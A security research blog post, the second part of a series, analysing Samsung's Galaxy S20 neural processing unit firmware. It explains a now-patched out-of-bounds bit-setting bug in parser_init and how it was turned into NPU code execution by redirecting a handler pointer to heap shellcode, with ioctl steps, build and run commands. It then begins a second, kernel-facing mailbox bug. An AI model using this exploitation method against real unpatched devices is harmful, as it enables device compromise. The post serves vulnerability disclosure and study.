Disclaimer
This work was done while we were working at Longterm Security and they have kindly allowed us to release the article on our company's blog.
After an in-depth analysis of the NPU OS and its interaction with the Android kernel, this second part gives a more offensive outlook on this component. We will go through the main attack vectors to target it and detail two vulnerabilities that can be chained together to get code execution in the NPU from the NPU driver before pivoting back into the kernel.
This article is the second part in a series about reversing and exploiting Samsung's Neural Processing Unit. NPUs are generally used to provide dedicated computing power for machine learning and AI-related algorithms. While it could make for an interesting article, if you've read the first part, you know that our primary interest is rather the underlying custom OS Samsung has implemented for its NPU.
Part 1 focused on reverse engineering almost exhaustively what could be considered the kernel of the NPU OS, i.e. all the subsystems related to memory allocation, task scheduling, event handling, etc. While reading it is encouraged to understand this second part, it's not a prerequisite. We will try to provide the necessary context along the way so that you can still follow easily.
In this second part, we will detail two vulnerabilities that were identified while reverse engineering the NPU OS. We will also explain how an exploit can be constructed to trigger a buffer overflow in the Android kernel from a user able to access the NPU driver.
Regarding the disclosure process, these issues have been reported to Samsung and have been patched in their May and June security bulletins under the identifiers `SVE-2021-20204` and `SVE-2021-21074`. The exploits used in this article are tailored for the Samsung Galaxy S20 `SM-G980F` running the unpatched firmware `G980FXXS5CTL5` from January 2021.
Now that we are done with the introduction, let's move on to the analysis of the first vulnerability identified: a limited write to an arbitrary address in the NPU's address space.
As we have explained previously, the NPU is a dedicated chip running its own firmware independently from the Android kernel. In simplified terms, the NPU is a blackbox providing an API that can be queried from the kernel. Inputs are sent to it, ML algorithms do their magic, and the results are sent back.
In the first part of this series, in the section called Interacting with the NPU, we explained how the NPU and the kernel communicate using a system of shared memory and mailboxes. In a nutshell, the kernel starts off by mapping the NPU's shared memory regions using `init_iomem_area`. It then creates a request for the NPU and writes it into the mailbox by calling `npu_session_put_nw_req`. Once the message is ready to be sent, an interrupt is triggered and the NPU is notified that a new request is waiting in its low priority mailbox.
The task responsible for the low priority mailbox parses the message using `mbx_dnward_get` and calls the corresponding command handler in `mbx_msghub_req`. The 9 command handlers implemented in the NPU are defined in `init_ncp_handlers`.
void init_ncp_handlers(struct ncp_handler_state_t *ncp_handler_state) {
ncp_handler_state->_unk_0x364 = 4;
/* Resets messages state */
for (int i = 0; i < NB_MESSAGES; i++) {
ncp_handler_state->messages[i].state = RESPONSE_FREE;
}
/* Initializes the handlers for the request commands */
ncp_handler_state->handlers[0] = ncp_manager_load;
ncp_handler_state->handlers[1] = ncp_manager_unload;
ncp_handler_state->handlers[2] = ncp_manager_process;
ncp_handler_state->handlers[3] = profile_control;
ncp_handler_state->handlers[4] = ncp_manager_purge;
ncp_handler_state->handlers[5] = ncp_manager_powerdown;
ncp_handler_state->handlers[6] = ut_main_func;
ncp_handler_state->handlers[7] = ncp_manager_policy;
ncp_handler_state->handlers[8] = ncp_manager_end;
}
While pretty succinct, this explanation should give you a rough understanding of where our data comes from and how to map a request type in the kernel to a command handler in the NPU (e.g. `COMMAND_FW_TEST` and `ut_main_func`).
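The mapping from a command ID to a handler can be pictured as a plain table lookup. The sketch below is only an illustration of that idea: the type `ncp_handler_t`, the struct `handler_table`, the stand-in `demo_handler` and the function `dispatch_command` are hypothetical names, and the bounds check is an assumption about what a careful dispatcher would do, not a decompilation of `mbx_msghub_req`.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define NB_HANDLERS 9 /* number of handlers set up in init_ncp_handlers */

/* Hypothetical, simplified handler signature used for this sketch only. */
typedef int (*ncp_handler_t)(void *cmd);

struct handler_table {
    ncp_handler_t handlers[NB_HANDLERS];
};

/* Stand-in for a real handler such as ut_main_func. */
static int demo_handler(void *cmd) {
    (void)cmd;
    return 42;
}

/*
 * Looks up the handler registered for `command` and calls it.
 * Returns -1 when the ID is out of range or the slot is empty.
 */
static int dispatch_command(const struct handler_table *table,
                            uint32_t command, void *cmd) {
    assert(table != NULL);
    if (command >= NB_HANDLERS || table->handlers[command] == NULL)
        return -1;
    return table->handlers[command](cmd);
}
```

Registering `demo_handler` in slot 6, the slot `ut_main_func` occupies in `init_ncp_handlers`, and calling `dispatch_command(&table, 6, NULL)` invokes it, while an ID of 9 or more is rejected.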
These handlers are the most obvious entry points into the NPU and targets of choice when it comes to vulnerability research. The next section presents a bug in one of those handlers, namely `ncp_manager_load`.
To perform its tasks, the NPU relies on a system of objects called `ncp_object`, which are filled with inputs sent by the kernel. They are identified by a number and persist across requests, so multiple operations can be performed on them if needed. As the names of the command handlers suggest, the available operations include loading, unloading and processing an object. In our case, we will be looking at the loading process implemented in `ncp_manager_load`.
Information sent from the kernel is initially parsed as a `struct message`, which specifies the command handler ID, the data to process and its length.
struct message {
u32 magic;
u32 mid;
u32 command;
u32 length;
u32 self;
u32 data;
};
The field `data` points to another structure, namely `struct command`, which is passed to the command handlers. The NPU can then retrieve the payload to process, as well as other information related to the request in the union `c` (e.g. object ID, task ID, etc.):
struct command {
union {
struct cmd_load load;
struct cmd_unload unload;
struct cmd_process process;
struct cmd_profile_ctl profile_ctl;
struct cmd_fw_test fw_test;
struct cmd_purge purge;
struct cmd_powerdown powerdown;
struct cmd_done done;
struct cmd_ndone ndone;
struct cmd_group_done gdone;
} c; /* specific command properties */
u32 length; /* the size of payload */
u32 payload;
};
As can be seen in the code snippet below, after performing some sanity checks on the input values, `ncp_manager_load` calls an initialization handler from `g_ncp_object_state.callbacks`. If the object we're trying to use is free, the callback used will be `ncp_object_load`, to which we pass the NCP object as well as the initial pointer to the `command` structure from the kernel.
int ncp_manager_load(struct command **cmd_p) {
    int ret;
    struct command *cmd = *cmd_p;
    struct ncp_object *obj;
    /* Checks if the object ID is not out of bounds */
    if (cmd->c.load.oid >= 8) {
        ret = 0x106;
        return ret;
    }
    /* Checks if the task ID is valid and not out of bounds */
    if (cmd->c.load.tid >= 2 && cmd->c.load.tid != -1) {
        ret = 0x108;
        return ret;
    }
    obj = g_ncp_object_state.objects[cmd->c.load.oid];
    /* Irrelevant object setup */
    /* [...] */
    /*
     * Calls the corresponding initialisation callbacks
     * Depending on the current state of the object, one of those callbacks
     * could be something like ncp_object_load, ncp_object_process, or
     * ncp_object_invalid if we're trying to perform an invalid operation.
     *
     * In any case, when using an object for the first time, assuming
     * memory wasn't tampered with, the function called will be
     * ncp_object_load.
     */
    (*g_ncp_object_state.callbacks[obj->state * 2])(obj, cmd_p);
    /*
     * The rest of the function is not really relevant since it won't
     * interfere with our exploit once the vulnerable function in
     * ncp_object_load returns.
     */
    /* [...] */
}
`ncp_object_load` checks that the payload and the length are not empty and, if that's the case, it calls `parser_init` with a pointer to a field in the `ncp_object`, the payload address and its length.
int ncp_object_load(struct ncp_object *obj, struct command **cmd_p) {
    int ret;
    struct command *cmd = *cmd_p;
    /* Checks the payload pointer */
    if (cmd->payload) {
        /* Checks the payload length */
        if (cmd->length) {
            /* Parses the payload to fill the NCP object */
            ret = parser_init(
                &obj->ncp_object_copy_ptr, cmd->payload, cmd->length);
            /* [...] */
        }
    }
    /*
     * The rest of the function is not really relevant and won't
     * interfere with our exploit.
     */
    /* [...] */
}
The role of `parser_init` is central to the loading process: it is responsible for parsing the kernel data stored in `cmd->payload` and copying it into the corresponding NCP object.
`cmd->payload` consists of a header which references data placed after it. This header is an `ncp_header` structure and is given below.
/* ncp_header structure used as header for the payload */
struct ncp_header {
u32 magic_number1;
u32 hdr_version;
u32 hdr_size;
u32 intrinsic_version;
u32 net_id;
u32 unique_id;
u32 priority;
u32 flags;
u32 period;
u32 workload;
u32 address_vector_offset;
u32 address_vector_cnt;
u32 memory_vector_offset;
u32 memory_vector_cnt;
u32 group_vector_offset;
u32 group_vector_cnt;
u32 body_version;
u32 body_offset;
u32 body_size;
u32 io_vector_offset;
u32 io_vector_cnt;
u32 reserved[10];
u32 magic_number2;
};
`parser_init` starts off by performing sanity checks on the header fields to make sure the kernel did not send an invalid or incompatible payload.
int parser_init(struct ncp_object *ncp_object, struct ncp_header *payload, int length) {
/* Checks the first magic number at the beginning of the structure */
if (payload->magic_number1 != 0xC0FFEE0)
return 0x10D;
/* Checks the second magic number at the end of the structure */
if (payload->magic_number2 != 0xC0DEC0DE)
return 0x10E;
/*
* Makes sure the header version used by the kernel is the same as
* the NPU.
*/
if (payload->hdr_version != 0x16)
return 0x10F;
/*
* Makes sure the intrinsic API version used by the kernel is the same
* as the NPU.
*/
if (payload->intrinsic_version < 0x15)
return 0x10F;
/* Makes sure the payload does not extend outside the heap */
u32 header_size = length - 0x7C * payload->io_vector_cnt;
if (header_size >= 0x60000)
return 0x10B;
/* [...] */
It then allocates memory for the new NCP object and starts copying data into it.
int parser_init(struct ncp_object *ncp_object, struct ncp_header *payload, int length) {
/*
* Allocates memory to get a copy of the header from the kernel into
* the NPU
*/
struct ncp_header *ncp_header = (struct ncp_header *)malloc(header_size);
if ( !ncp_header )
return 0x10C;
/* Copies the header from the payload */
memcpy(ncp_header, payload, header_size);
/* NCP object setup ------------------------------------------------ */
/* Addresses relative to ncp_header */
ncp_object->ncp_cpy.buffer = ncp_header;
ncp_object->ncp_cpy.address_vector = \
ncp_header + ncp_header->address_vector_offset;
ncp_object->ncp_cpy.memory_vector = \
ncp_header + ncp_header->memory_vector_offset;
ncp_object->ncp_cpy.io_vector = \
ncp_header + ncp_header->io_vector_offset;
ncp_object->ncp_cpy.group_vector = \
ncp_header + ncp_header->group_vector_offset;
ncp_object->ncp_cpy.chunks = ncp_object->chunks;
ncp_object->ncp_cpy.body = ncp_header + ncp_header->body_offset;
/* Addresses relative to the payload */
ncp_object->ncp_src.buffer = payload;
ncp_object->ncp_src.address_vector = \
payload + ncp_header->address_vector_offset;
ncp_object->ncp_src.memory_vector = \
payload + ncp_header->memory_vector_offset;
ncp_object->ncp_src.io_vector = \
payload + ncp_header->io_vector_offset;
ncp_object->ncp_src.group_vector = \
payload + ncp_header->group_vector_offset;
ncp_object->ncp_src.chunks = ncp_object->chunks;
ncp_object->ncp_src.body = payload + ncp_header->body_offset;
ncp_object->_unk_48 = 0;
ncp_object->vector_cnt = ncp_header->group_vector_cnt;
ncp_object->_unk_54 = 0;
ncp_object->chunk_cnt = 0;
ncp_object->header = ncp_header;
/* ----------------------------------------------------------------- */
/* [...] */
As you can see, some addresses are computed using an offset provided in the payload. While some of those are verified in the kernel, others are left unchecked. In particular, the field `group_vector_offset` is used as an offset to retrieve an array of group vectors. A rough decompiled version of the code parsing the group vectors is given below.
int parser_init(struct ncp_object *ncp_object, struct ncp_header *payload, int length) {
/*
* Computes the group_vector address using the user-controlled
* value `group_vector_offset` from the ncp header.
*/
struct group_vector *curr_group_vector = NULL;
struct group_vector *group_vectors = \
ncp_header + ncp_header->group_vector_offset;
/* [...] */
u32 vector_ctr = 0;
/* If there are vectors to parse... */
if (ncp_object->vector_cnt) {
while (1) {
/*
* Retrieves the offset and size of the current group vector
* at offsets 0x18 and 0x1c respectively.
*/
u32 intrinsic_offset = group_vectors->intrinsic_offset;
u32 intrinsic_size = group_vectors->intrinsic_size;
/* The intrinsic offset must be 4-byte aligned */
if (intrinsic_offset & 3)
return 0x115;
struct ncp_chunk* chunk = ncp_object->chunks[chunk_id];
if (0x7800 - chunk->_unk_08 < intrinsic_size) {
/* Marks the current group vector as processed */
if (curr_group_vector) {
curr_group_vector->flags |= 8;
/* [...] */
}
}
/* [...] */
/* Moves on to the next group vector */
curr_group_vector = group_vectors;
group_vectors++;
vector_ctr++;
/* If there is no more group vector to parse */
if (vector_ctr >= ncp_object->vector_cnt)
goto GROUP_VECTOR_SUCCESS;
}
}
/* [...] */
GROUP_VECTOR_SUCCESS:
/* Marks the last group vector as processed */
if (curr_group_vector) {
curr_group_vector->flags |= 8;
/* [...] */
}
Once `parser_init` has looped over all group vectors successfully, the 4th bit of `group_vector->flags` (mask `0x8`) is set for each of them to signify that they are valid. However, since the addresses of all `group_vector` objects are relative to `ncp_header->group_vector_offset`, which is user-controlled, it is possible to set the 4th bit of arbitrary bytes in the address space of the NPU. The only limitation is that the value coinciding with `group_vectors->intrinsic_offset` must be 4-byte aligned. The next section explains how this primitive can be exploited to get arbitrary code execution in the NPU.
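To make the primitive concrete, here is a minimal model of it, assuming a flat byte array stands in for the NPU address space. The function names and the bounds check in `mark_processed_checked` are hypothetical: they illustrate the kind of validation that is missing, and are not Samsung's actual patch.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define GROUP_VECTOR_PROCESSED 0x8u /* value OR-ed into flags by parser_init */

/*
 * Models the unchecked behaviour: `offset` comes straight from the payload
 * and is applied to the base of the copied header without any validation.
 * `mem` stands in for the NPU address space, `base` for the header copy.
 */
static void mark_processed_unchecked(uint8_t *mem, size_t base, size_t offset) {
    mem[base + offset] |= GROUP_VECTOR_PROCESSED;
}

/*
 * Hypothetical hardened variant: refuses any offset that leaves the
 * copied header. Returns 0 on success, -1 if the offset is rejected.
 */
static int mark_processed_checked(uint8_t *mem, size_t base,
                                  size_t header_size, size_t offset) {
    assert(mem != NULL);
    if (offset >= header_size)
        return -1;
    mem[base + offset] |= GROUP_VECTOR_PROCESSED;
    return 0;
}
```

With a 16-byte header copy at index 16, an offset of 40 lets the unchecked version set the bit at index 56, well outside the header, whereas the checked version rejects it.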
Before we can start, we need to take a look at the SELinux context to list which components are able to communicate with the NPU.
Samsung's NPU device driver `/dev/vertex10` used to be accessible from the `untrusted_app` SELinux context. However, as can be seen below, access was made more restrictive after Project Zero's disclosure of vulnerabilities affecting this driver.
x1s:/dev # ls -lZ /dev/vertex10
crw-r--r-- 1 system system u:object_r:vendor_npu_device:s0 82, 10 2021-03-16 12:16 /dev/vertex10
This means that in order to communicate with it, we would need a first privilege escalation into a context allowed to access the `vendor_npu_device` SELinux type. On the firmware we analyzed, we can see that there are five contexts able to send ioctls to the NPU driver:
hal_camera_default
hal_neuralnetworks_eden_drv_default
hal_vendor_eden_runtime_default
platform_app
snap_hidl
lyte@debian:~/tmp$ sesearch --allow s20_selinux_policy | grep vendor_npu_device | grep ioctl
allow hal_camera_default vendor_npu_device:chr_file { ioctl open read write };
allow hal_neuralnetworks_eden_drv_default vendor_npu_device:chr_file { ioctl open read write };
allow hal_vendor_eden_runtime_default vendor_npu_device:chr_file { ioctl open read write };
allow platform_app vendor_npu_device:chr_file { ioctl open read };
allow snap_hidl vendor_npu_device:chr_file { append getattr ioctl lock map open read watch watch_reads write };
And as far as we can tell, this could be achieved by compromising one of the following processes:
x1s:/dev # ps -ZA | grep -e hal_camera_default -e hal_neuralnetworks_eden_drv_default -e hal_vendor_eden_runtime_default -e platform_app -e snap_hidl
u:r:hal_neuralnetworks_eden_drv_default:s0 system 6104 1 11310600 14172 binder_ioctl_write_read 0 S android.hardware.neuralnetworks@1.3-service.eden-drv
u:r:hal_camera_default:s0 cameraserver 6125 1 10958168 11580 binder_ioctl_write_read 0 S vendor.samsung.hardware.camera.provider@4.0-service_64
u:r:snap_hidl:s0 system 6132 1 10801344 3728 binder_ioctl_write_read 0 S vendor.samsung.hardware.snap@1.1-service
u:r:hal_vendor_eden_runtime_default:s0 system 6179 1 11305928 14196 binder_ioctl_write_read 0 S vendor.samsung_slsi.hardware.eden_runtime@1.0-service
u:r:platform_app:s0:c512,c768 u0_a62 6982 6077 16114388 346668 ep_poll 0 S com.android.systemui
u:r:platform_app:s0:c512,c768 u0_a151 7532 6077 14853708 226100 ep_poll 0 S com.sec.android.app.launcher
u:r:platform_app:s0:c512,c768 oem_5013 7777 6077 14127536 125892 ep_poll 0 S com.sec.location.nsflp2
u:r:platform_app:s0:c512,c768 u0_a124 8517 6077 14024140 107888 ep_poll 0 S com.samsung.android.smartsuggestions
u:r:platform_app:s0:c512,c768 u0_a213 9226 6077 14832340 147584 ep_poll 0 S com.samsung.android.app.spage
u:r:platform_app:s0:c512,c768 vendor_cmhservice 10115 6077 15057436 135868 ep_poll 0 S com.samsung.cmh:CMH
u:r:platform_app:s0:c512,c768 u0_a73 11551 6077 14605848 141736 ep_poll 0 S com.samsung.android.app.cocktailbarservice
u:r:platform_app:s0:c512,c768 vendor_bcmgr 13858 6077 14002784 107068 ep_poll 0 S com.samsung.android.beaconmanager
u:r:platform_app:s0:c512,c768 u0_a116 16417 6077 14578312 144200 ep_poll 0 S com.sec.android.app.camera
u:r:platform_app:s0:c512,c768 u0_a230 22542 6077 14119200 136896 ep_poll 0 S com.samsung.android.calendar
u:r:platform_app:s0:c512,c768 u0_a120 27008 6079 2022612 131968 ep_poll 0 S com.samsung.android.mobileservice
u:r:platform_app:s0:c512,c768 u0_a118 27056 6077 14688588 162236 ep_poll 0 S com.osp.app.signin
u:r:platform_app:s0:c512,c768 vendor_cmhservice 28417 6077 14074464 127488 ep_poll 0 S com.samsung.storyservice
u:r:platform_app:s0:c512,c768 u0_a183 29598 6079 1993840 101000 ep_poll 0 S com.samsung.android.app.smartcapture:screenrecorder
u:r:platform_app:s0:c512,c768 u0_a132 29637 6077 14153028 140804 ep_poll 0 S com.samsung.knox.securefolder
u:r:platform_app:s0:c512,c768 u0_a62 29683 6077 14072516 139300 ep_poll 0 S com.samsung.android.app.routines:RoutineUIProcess
u:r:platform_app:s0:c512,c768 u0_a62 29701 6077 14577548 142168 ep_poll 0 S com.samsung.android.app.aodservice
u:r:platform_app:s0:c512,c768 u0_a116 29743 6077 14596868 145088 ep_poll 0 S com.sec.android.app.camera:QrTileService
u:r:platform_app:s0:c512,c768 u0_a140 29751 6077 14548660 120172 ep_poll 0 S com.sec.android.app.soundalive
u:r:platform_app:s0:c512,c768 vendor_sharelive 29784 6077 14185152 140744 ep_poll 0 S com.samsung.android.app.sharelive
u:r:platform_app:s0:c512,c768 u0_a99 30118 6079 1461684 109072 ep_poll 0 S com.samsung.android.mdx
u:r:platform_app:s0:c512,c768 u0_a89 30155 6077 14116800 137956 ep_poll 0 S com.samsung.android.game.gos
u:r:platform_app:s0:c512,c768 u0_a93 30174 6077 14857764 150664 ep_poll 0 S com.samsung.android.game.gamehome
u:r:platform_app:s0:c512,c768 vendor_cmhservice 32195 6077 14684604 163392 ep_poll 0 S com.samsung.faceservice
Getting access to one of these processes is not the goal of this article and we will assume that we're already running in a SELinux context allowed to send ioctls to `/dev/vertex10`.
Writing an exploit for this vulnerability was relatively straightforward, partly because there are few security mitigations used in the NPU. As we can see in the table below, multiple writable sections are not marked as non-executable and, during the initialization of the NPU, the `WXN` bit is not set in `SCTLR`. This means that if we are somehow able to inject shellcode into one of the RWX sections and redirect the execution flow to it, we can take control of the NPU.
Type | Virtual Address | Physical Address | Size | PXN | XN | NS | AP | B | C | S |
---|---|---|---|---|---|---|---|---|---|---|
Short Desc. | 0x00000000 | 0x50000000 | 0x0001d000 | N | N | N | Writes at PL0 generate Permission faults | Y | Y | N |
Short Desc. | 0x0001d000 | 0x5001d000 | 0x00003000 | N | N | N | Writes at PL0 generate Permission faults | Y | Y | N |
Short Desc. | 0x00020000 | 0x50020000 | 0x0000c000 | N | N | N | Writes at PL0 generate Permission faults | Y | Y | N |
Short Desc. | 0x0002c000 | 0x5002c000 | 0x00004000 | N | N | N | Writes at PL0 generate Permission faults | Y | Y | N |
Short Desc. | 0x00030000 | 0x50030000 | 0x00001000 | N | N | N | Writes at PL0 generate Permission faults | Y | Y | N |
Short Desc. | 0x00031000 | 0x50031000 | 0x00002800 | N | N | N | Full access | Y | Y | N |
Short Desc. | 0x00033800 | 0x50033800 | 0x00001000 | N | N | N | Full access | Y | Y | N |
Short Desc. | 0x00034800 | 0x50034800 | 0x00001000 | N | N | N | Full access | Y | Y | N |
Short Desc. | 0x00035800 | 0x50035800 | 0x00001000 | N | N | N | Full access | Y | Y | N |
Short Desc. | 0x00036800 | 0x50036800 | 0x00001000 | N | N | N | Full access | Y | Y | N |
Short Desc. | 0x00037800 | 0x50037800 | 0x00005000 | N | N | N | Full access | Y | Y | N |
Short Desc. | 0x0003c800 | 0x5003c800 | 0x0002b800 | N | N | N | Full access | Y | Y | N |
Short Desc. | 0x00068000 | 0x50068000 | 0x00018000 | N | N | N | Full access | N | N | N |
Short Desc. | 0x00080000 | 0x50080000 | 0x00060000 | N | N | N | Full access | Y | Y | N |
As you can imagine, we will be using our bit-setting primitive to alter the execution flow. The only questions that remain are where to place our shellcode and what to modify in order to redirect the execution flow to it.
The answer to the first question is relatively easy. In `parser_init`, the payload received by the NPU is copied into a buffer allocated using `malloc` and therefore residing on the heap, which spans the executable region `0x80000-0xe0000`. We can place our shellcode at the end of the payload and execute it from the version copied on the heap.
The solution we chose for the second issue was to modify one bit of a function pointer to make it point to our shellcode. Potential candidates for this step include the handlers defined in `init_ncp_handlers`, which were highlighted at the beginning of this article.
All of these handlers are located in the first code section `0x0-0x1d000`. Conveniently, setting the 4th bit (mask `0x8`) of the byte at offset 2 of a dword, which is bit 19 of the 32-bit value, transforms an address in the code section, like `0x14abc`, into `0x80000 | 0x14abc = 0x94abc`, which is now on the heap!
For our exploit, we picked the function pointer of `ncp_manager_purge`, which initially pointed to `0x14C48`, and changed it to `0x94C48`. Since the payload we send from the kernel can be arbitrarily long (at least long enough to control the area around `0x94C48`), afterwards we just need to insert our shellcode at the correct offset and call `ncp_manager_purge` from the kernel to make the NPU execute our arbitrary instructions. In the next section, we will list the relevant steps to write an exploit and make this possible.
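The effect of the flags write on a stored pointer can be checked with a few lines of C. This is a small sketch, assuming the pointer is stored in little-endian byte order; `set_flag_bit_in_byte` is a hypothetical helper name.

```c
#include <assert.h>
#include <stdint.h>

/*
 * ORs 0x08 into the byte at `byte_index` of a 32-bit value laid out in
 * little-endian order, the way the flags write lands on a stored pointer.
 */
static uint32_t set_flag_bit_in_byte(uint32_t value, unsigned byte_index) {
    uint8_t bytes[4];
    uint32_t out = 0;

    assert(byte_index < 4);
    /* Split the value into bytes explicitly so the result does not
     * depend on the endianness of the machine running this sketch. */
    for (unsigned i = 0; i < 4; i++)
        bytes[i] = (uint8_t)(value >> (8 * i));
    bytes[byte_index] |= 0x08;
    for (unsigned i = 0; i < 4; i++)
        out |= (uint32_t)bytes[i] << (8 * i);
    return out;
}
```

Calling `set_flag_bit_in_byte(0x14C48, 2)` returns `0x94C48`, which matches the redirected `ncp_manager_purge` pointer described above.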
The exploit we developed for this vulnerability is available here. It first starts by allocating and mapping an ION buffer before opening the NPU driver `/dev/vertex10`.
It then loads the payload we want to execute from `"/data/local/tmp/payload.bin"`. In the Makefile we provide, the payload is compiled from this file and will output a simple `"PATCHED_NPU: hello from the NPU!"` in `dmesg`.
The actual exploitation starts with the call to `exploit_parser_init_arb_write`, which is going to set `group_vector_offset` to the following out-of-bounds value: `NPU_SHUTDOWN_OFFSET + NPU_SHUTDOWN_BYTE_POS - NEXT_MALLOC_ADDR`.
- `NPU_SHUTDOWN_OFFSET` is the offset of `ncp_manager_purge`'s function pointer.
- `NPU_SHUTDOWN_BYTE_POS` is the position of the second byte which also takes into account the offset induced by the `flags` field in the `group_vector` object.
- `NEXT_MALLOC_ADDR` is the address returned by malloc when it allocates a chunk for the `ncp_header` copy in `parser_init`. This value was determined by simply patching the NPU and reading it dynamically (which is possible because there is no signature verification for this binary).
This will place the `flags` field of our `group_vector` object over our targeted byte to change the underlying address from `0x14C48` to `0x94C48`. `exploit_parser_init_arb_write` also calls `init_ncp_header`, which copies the custom payload into the ION buffer that will be sent to the kernel and, ultimately, to the NPU. The rest of the values set in the header are mostly irrelevant and won't be explained in this article.
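The offset computation relies on 32-bit wraparound, since the targeted pointer sits below the heap allocation. The sketch below shows the arithmetic only. Every numeric value used with it here (pointer address `0x37000`, `flags` field offset `0x8`, allocation address `0x90000`) is a made-up placeholder, not a value taken from the firmware, and both function names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

/*
 * Computes the group_vector_offset that makes the flags byte of the first
 * group vector overlap byte `byte_index` of the pointer at `target_ptr_addr`.
 * Unsigned 32-bit arithmetic wraps, which is what allows a target located
 * below the header copy to be reached.
 */
static uint32_t compute_group_vector_offset(uint32_t target_ptr_addr,
                                            uint32_t byte_index,
                                            uint32_t flags_field_offset,
                                            uint32_t header_copy_addr) {
    assert(byte_index < 4);
    return target_ptr_addr + byte_index - flags_field_offset - header_copy_addr;
}

/* Address at which the parser would then OR 0x8 into flags. */
static uint32_t flags_write_address(uint32_t header_copy_addr,
                                    uint32_t group_vector_offset,
                                    uint32_t flags_field_offset) {
    return header_copy_addr + group_vector_offset + flags_field_offset;
}
```

With the placeholder values, `compute_group_vector_offset(0x37000, 2, 0x8, 0x90000)` yields `0xFFFA6FFA`, and feeding that back into `flags_write_address` gives `0x37002`, the byte at offset 2 of the targeted pointer.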
At this stage, all that remains is to send the data to the NPU. This is achieved by first using the ioctl `VS4L_VERTEXIOC_S_GRAPH` and then `VS4L_VERTEXIOC_S_FORMAT`. In the exploit, this logic is implemented in the function `do_graph_format_ioctl`. `VS4L_VERTEXIOC_S_FORMAT` will trigger a call to `npu_session_NW_CMD_LOAD`, which executes `ncp_manager_load` in the NPU and thus our vulnerable function `parser_init` that uses our out-of-bounds `group_vector_offset`. Once this ioctl returns, the NPU will have modified the function pointer of its `ncp_manager_purge` handler. All that is left to do is to call it.
Before we can proceed, however, a few requirements have to be met. `COMMAND_PURGE` is sent to the NPU when performing a `STREAMOFF` operation. But to call `VS4L_VERTEXIOC_STREAM_OFF`, we first need to call `VS4L_VERTEXIOC_STREAM_ON`, and being able to call `VS4L_VERTEXIOC_STREAM_ON` requires the driver's `inqueue` and `outqueue` to be properly configured.
The operations needed to configure these queues are implemented in the functions `setup_in_queue` and `setup_out_queue`. They simply send valid requests that specify the directions `VS4L_DIRECTION_IN` and `VS4L_DIRECTION_OUT`.
We can now call `trigger` to make a `VS4L_VERTEXIOC_STREAM_ON` ioctl followed by a `VS4L_VERTEXIOC_STREAM_OFF`. If everything went as expected, these calls should succeed and the message `"PATCHED_NPU: hello from the NPU!"` should appear in `dmesg`.
If you have an unpatched Samsung Galaxy S20, you can try the exploit by first compiling it using the Android NDK and the Makefile provided.
$ make build
/opt/android-ndk/toolchains/llvm/prebuilt/darwin-x86_64/bin/aarch64-linux-android29-clang \
-Tsymbols.ld -fPIC --target=arm-none-eabi -march=armv7a -nostdlib \
-fpie -ffreestanding -ffunction-sections -fomit-frame-pointer -o \
payload.bin payload.c
/opt/android-ndk/toolchains/llvm/prebuilt/darwin-x86_64/bin/aarch64-linux-android-objcopy \
-O binary --strip-all payload.bin
/opt/android-ndk/toolchains/llvm/prebuilt/darwin-x86_64/bin/aarch64-linux-android29-clang \
-o parser_init parser_init.c
You can then push it on a device and run it.
$ make push
// [...]
$ make run
// [...]
adb wait-for-device shell \
su root sh -c "/data/local/tmp/parser_init /data/local/tmp/"
[+] Opening /dev/ion
[+] ION allocation
[+] ION buffer mapping
[+] Opening /dev/vertex10
[+] Loading the payload
The following message should appear in `dmesg -w`:
x1s:/ # dmesg -w | grep "PATCHED_NPU"
[ 5454.496319] [__LOW][0005449.475]PATCHED_NPU: hello from the NPU!
We finally have code execution in the NPU! Now we can have a look at the second vulnerability we identified, which can be leveraged to attack the kernel from the NPU.
In this section, we will give a quick recap on how these mailboxes work. If you want more details, you can head over to the first part of this series. As we have said before, the NPU and the kernel exchange data using a system of mailboxes implemented over shared memory. There are four mailboxes organized according to the format given below:
A header is used to keep track of the different read/write pointers into the ring buffers. It is defined using the structure `struct mailbox_hdr`:
struct mailbox_hdr {
u32 max_slot;
u32 debug_time;
u32 debug_code;
u32 log_level;
u32 log_dram;
u32 reserved[8];
struct mailbox_ctrl h2fctrl[MAILBOX_H2FCTRL_MAX];
struct mailbox_ctrl f2hctrl[MAILBOX_F2HCTRL_MAX];
u32 totsize;
u32 version;
u32 signature2;
u32 signature1;
};
When a message arrives or a response is sent, the read/write pointers stored in the `mailbox_ctrl` structures are updated to reflect the new positions of the cursor inside the ring buffers.
struct mailbox_ctrl {
u32 sgmt_ofs;
u32 sgmt_len;
u32 wptr;
u32 rptr;
};
An illustration of this process is given below:
Keep in mind that all values in the mailboxes and the header are shared and can be changed by either the NPU or the Android kernel. As you might expect, this can lead to bugs if one side trusts the other a bit too much, as we will see in the next section.
For this vulnerability, we will be taking a look at the functions retrieving the output of an NPU request. When the NPU is done handling a command, it writes the result back into the response mailbox `f2hctrl[0]`. Once the result is received, the function `nw_rslt_manager` is called.
int nw_rslt_manager(int *ret_msgid, struct npu_nw *nw)
{
int ret;
struct message msg;
struct command cmd;
/* [...] */
ret = mbx_ipc_get_cmd((void *)interface.addr, &interface.mbox_hdr->f2hctrl[0], &msg, &cmd);
/* [...] */
}
`nw_rslt_manager` then calls `mbx_ipc_get_cmd` with the argument `&interface.mbox_hdr->f2hctrl[0]`, where `interface.mbox_hdr` points to the shared mailbox header.
This function reads the content of the mailbox header, before copying the result of the NPU request into `cmd` using `__copy_command_from_line`.
int mbx_ipc_get_cmd(char *underlay, volatile struct mailbox_ctrl *ctrl, struct message *msg, struct command *cmd)
{
/* [...] */
/* Reads the values stored in the mailbox header */
base = underlay - ctrl->sgmt_ofs;
sgmt_len = ctrl->sgmt_len;
rptr = ctrl->rptr;
wptr = ctrl->wptr;
/* Checks if the readable size in the buffer is bigger than the message size */
readable_size = __get_readable_size(sgmt_len, wptr, rptr); /* ==> wptr - rptr */
if (readable_size < msg->length) {
ret = -EINVAL;
goto p_err;
}
/* Copies the result from the mailbox into `cmd` */
updated_rptr = __copy_command_from_line(base, sgmt_len, msg->data, cmd, msg->length);
ctrl->rptr = updated_rptr;
p_err:
return ret;
}
static inline u32 __copy_command_from_line(char *base, u32 sgmt_len, u32 rptr, void *cmd, u32 cmd_size)
{
/* need to reimplement according to user environment */
memcpy(cmd, base + LINE_TO_SGMT(sgmt_len, rptr), cmd_size);
return rptr + cmd_size;
}
